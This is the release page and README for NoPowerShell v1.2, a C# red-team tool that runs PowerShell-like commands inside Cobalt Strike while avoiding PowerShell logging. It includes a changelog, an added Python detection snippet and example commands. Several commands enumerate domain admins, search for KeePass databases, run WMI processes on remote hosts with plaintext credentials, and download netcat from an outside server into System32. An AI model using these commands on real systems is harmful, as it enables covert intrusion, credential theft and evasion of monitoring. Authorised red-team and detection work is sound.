nopowershell v1.2 releases: PowerShell rebuilt in C# for Red Teaming purposes

NoPowerShell

NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to PowerShell's logging mechanisms. This .NET Framework 2-compatible binary can be loaded in Cobalt Strike to execute commands in memory. No System.Management.Automation.dll is used; only native .NET libraries.

Moreover, this project makes it easy for everyone to extend its functionality using only a few lines of C# code.
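As an added defender-side example (not part of the NoPowerShell project), the check below turns the statement above into detection logic: because the tool runs as a plain .NET assembly and never loads System.Management.Automation.dll, PowerShell script block logging sees nothing, but the CLR itself still has to be mapped into the host process. It assumes Sysmon Event ID 7 (ImageLoad) records flattened to Python dicts with EventID, ProcessGuid, Image and ImageLoaded keys; the sample records are constructed.

```python
# Added detection example (not part of NoPowerShell): flag processes that loaded
# the .NET CLR but never System.Management.Automation.dll, i.e. .NET code that
# runs outside the PowerShell engine and outside its script block logging.
# Input: Sysmon Event ID 7 (ImageLoad) records flattened to dicts (assumed shape).
from collections import defaultdict

# CLR runtime modules: mscorwks.dll hosts .NET 2.0/3.5 (NoPowerShell's target
# framework), clr.dll hosts .NET 4.x.
CLR_MODULES = {"mscorwks.dll", "clr.dll"}
PS_ENGINE = "system.management.automation.dll"


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_clr_without_ps_engine(events):
    """Return {ProcessGuid: Image} for processes whose image-load events include
    a CLR module but never the PowerShell engine assembly."""
    modules = defaultdict(set)
    image_of = {}
    for ev in events:
        if ev.get("EventID") != 7:   # only ImageLoad records carry ImageLoaded
            continue
        guid = ev["ProcessGuid"]
        modules[guid].add(basename(ev["ImageLoaded"]))
        image_of[guid] = ev["Image"]
    return {guid: image_of[guid] for guid, mods in modules.items()
            if mods & CLR_MODULES and PS_ENGINE not in mods}


# Constructed sample records, not real telemetry.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Regular PowerShell: CLR plus the engine assembly, so script block logging applies.
    {"EventID": 7, "ProcessGuid": "{P1}", "Image": PS,
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"},
    {"EventID": 7, "ProcessGuid": "{P1}", "Image": PS,
     "ImageLoaded": r"C:\Windows\assembly\GAC_MSIL\System.Management.Automation.dll"},
    # Non-.NET process loading an ordinary system DLL: no CLR, ignored.
    {"EventID": 7, "ProcessGuid": "{P2}", "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\ntdll.dll"},
    # Process that pulls in the .NET 2 runtime and never the PowerShell engine.
    {"EventID": 7, "ProcessGuid": "{P3}", "Image": r"C:\Temp\host.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"},
    # A record of another event type is skipped.
    {"EventID": 1, "ProcessGuid": "{P3}", "Image": r"C:\Temp\host.exe"},
]

if __name__ == "__main__":
    for guid, image in find_clr_without_ps_engine(SAMPLE_EVENTS).items():
        print(f"review: {image} {guid} loaded the CLR without the PowerShell engine")
```

Ordinary .NET applications trip the same condition, so in practice the hits are compared against an allowlist of known .NET hosts and correlated with process creation telemetry rather than alerted on directly.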

Changelog v1.2

  • Cmdlets added:
    • Get-ADComputer
    • Get-RemoteSmbShare
    • Stop-Process
  • Cmdlets updated:
    • Get-SystemInfo: Stability improvements
    • Get-ChildItem: Added support for listing env: and some refactoring
    • Get-ItemProperty: Implemented -Name option
    • Get-Process: Implemented -Name option
    • Resolve-DnsName: Implemented -Type option
  • Some minor improvements
  • Updated README
  • Updated Twitter handle in all files

Usage

Note

When using NoPowerShell from cmd.exe or PowerShell, you need to escape the pipe character (|) with a caret (^) or a backtick (`) respectively, i.e.:

  • cmd.exe: ls ^| select Name
  • PowerShell: ls `| select Name

Examples

Each entry lists the action, the NoPowerShell command that performs it, and any notes in parentheses.

  • List all commands supported by NoPowerShell: Get-Command
  • Get help for a command: Get-Help -Name Get-Process (alternative: man ps)
  • Show current user: NoPowerShell.exe whoami (unofficial command)
  • List all user groups in domain: Get-ADGroup -Filter *
  • List all administrative groups in domain: Get-ADGroup -LDAPFilter "(admincount=1)" | select Name
  • List all properties of the Administrator domain user: Get-ADUser -Identity Administrator -Properties *
  • List all administrative users in domain: Get-ADUser -LDAPFilter "(admincount=1)"
  • List all users in domain: Get-ADUser -Filter *
  • List specific attributes of a user: Get-ADUser Administrator -Properties SamAccountName,ObjectSID
  • Show information about the current system: systeminfo (unofficial command)
  • List all processes containing PowerShell in the process name: Get-Process | ? Name -Like *PowerShell*
  • List all active local users: Get-LocalUser | ? Disabled -EQ False
  • List all local groups: Get-LocalGroup
  • List details of a specific group: Get-LocalGroup Administrators
  • List all active members of the Administrators group: Get-LocalGroupMember -Group Administrators | ? Disabled -eq False
  • List all local users: Get-LocalUser
  • List details of a specific user: Get-LocalUser Administrator
  • Copy file from one location to another: copy C:\Tmp\nc.exe C:\Windows\System32\nc.exe
  • Copy folder: copy C:\Tmp\MyFolder C:\Tmp\MyFolderBackup
  • Locate KeePass files in the C:\Users\ directory: ls -Recurse -Force C:\Users\ -Include *.kdbx
  • List the keys under the SOFTWARE key in the registry: ls HKLM:\SOFTWARE
  • View contents of a file: Get-Content C:\Windows\WindowsUpdate.log
  • List autoruns in the registry: Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Run | ft
  • List processes: Get-Process
  • List processes on remote host: Get-Process -ComputerName dc01.corp.local -Username Administrator -Password P4ssw0rd!
  • Obtain data of the Win32_Process class from a remote system and apply a filter on the output: gwmi "Select ProcessId,Name,CommandLine From Win32_Process" -ComputerName dc01.corp.local | ? Name -Like *PowerShell* | select ProcessId,CommandLine (explicit credentials can be specified using the -Username and -Password parameters)
  • View details about a certain service: Get-WmiObject -Class Win32_Service -Filter "Name = 'WinRM'"
  • Launch process using WMI: Invoke-WmiMethod -Class Win32_Process -Name Create "cmd /c calc.exe" (this can also be done on a remote system)
  • Delete a read-only file: Remove-Item -Force C:\Tmp\MyFile.txt
  • Recursively delete a folder: Remove-Item -Recurse C:\Tmp\MyTools\
  • Show all network interfaces: Get-NetIPAddress -All
  • Show the IP routing table: Get-NetRoute
  • Send 2 ICMP requests to IP address 1.1.1.1 with a timeout of half a second: Test-NetConnection -Count 2 -Timeout 500 1.1.1.1
  • Perform a traceroute with a timeout of 1 second and a maximum of 20 hops: Test-NetConnection -TraceRoute -Timeout 1000 -Hops 20 google.com
  • List network shares on the local machine that are exposed to the network: Get-NetSmbMapping
  • Format output as a list: Get-LocalUser | fl
  • Format output as a list showing only specific attributes: Get-LocalUser | fl Name,Description
  • Format output as a table: Get-Process | ft
  • Format output as a table showing only specific attributes: Get-Process | ft ProcessId,Name
  • Download file from the Internet: wget http://myserver.me/nc.exe (when compiled for .NET 2, only SSL up to SSLv3 is supported, no TLS 1.1+)
  • Download file from the Internet specifying the destination: wget http://myserver.me/nc.exe -OutFile C:\Tmp\netcat.exe
  • Count number of results: Get-Process | measure
  • Count number of lines in a file: gc C:\Windows\WindowsUpdate.log | measure
  • Show only the Name in a file listing: ls C:\ | select Name
  • Show first 10 results of a file listing: ls C:\Windows\System32 -Include *.exe | select -First 10 Name,Length
  • List all members of the "Domain Admins" group: Get-ADGroupMember "Domain Admins"
  • Resolve domain name: Resolve-DnsName microsoft.com (alternative: host linux.org)
  • List local shares: Get-WmiObject -Namespace ROOT\CIMV2 -Query "Select * From Win32_Share Where Name LIKE '%$'" (alternative: gwmi -Class Win32_Share -Filter "Name LIKE '%$'")
  • Show network interfaces: Get-NetIPAddress (alternatives: ipconfig, ifconfig)

Download

Copyright (c) 2018, Arris Huijgen
All rights reserved.